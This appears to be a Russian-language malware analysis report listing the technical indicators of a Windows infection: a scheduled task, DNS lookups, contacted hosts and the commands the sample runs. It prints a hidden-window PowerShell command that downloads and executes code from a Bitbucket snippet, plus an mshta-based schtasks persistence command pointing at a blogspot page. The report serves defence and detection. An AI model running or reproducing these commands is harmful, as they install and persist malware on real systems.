Техническая информация
- <SYSTEM32>\tasks\secotaksa
- '<SYSTEM32>\mshta.exe' HTTp://bi##y.com/dghkascbsaasdyahsd
- 'bi##y.com':80
- 'jo###########aabagebarhomeintum.blogspot.com':443
- 'bl##ger.com':443
- 're#####es.blogblog.com':443
- 'oc##.#tartssl.com':80
- http://bi##y.com/dghkascbsaasdyahsd
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- 'jo###########aabagebarhomeintum.blogspot.com':443
- 'bl##ger.com':443
- 're#####es.blogblog.com':443
- DNS ASK bi##y.com
- DNS ASK jo###########aabagebarhomeintum.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK re#####es.blogblog.com
- DNS ASK oc##.#tartssl.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/4XXx68/26fa5d00c3ff68875599821ca7eb8b0b63b660cf/files/muti') -useB);' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://12###########48@randikhanaekminar.blogspot.com/p/muti.html\""' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/4XXx68/26fa5d00c3ff68875599821ca7eb8b0b63b660cf/files/muti') -useB);
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://12###########48@randikhanaekminar.blogspot.com/p/muti.html\""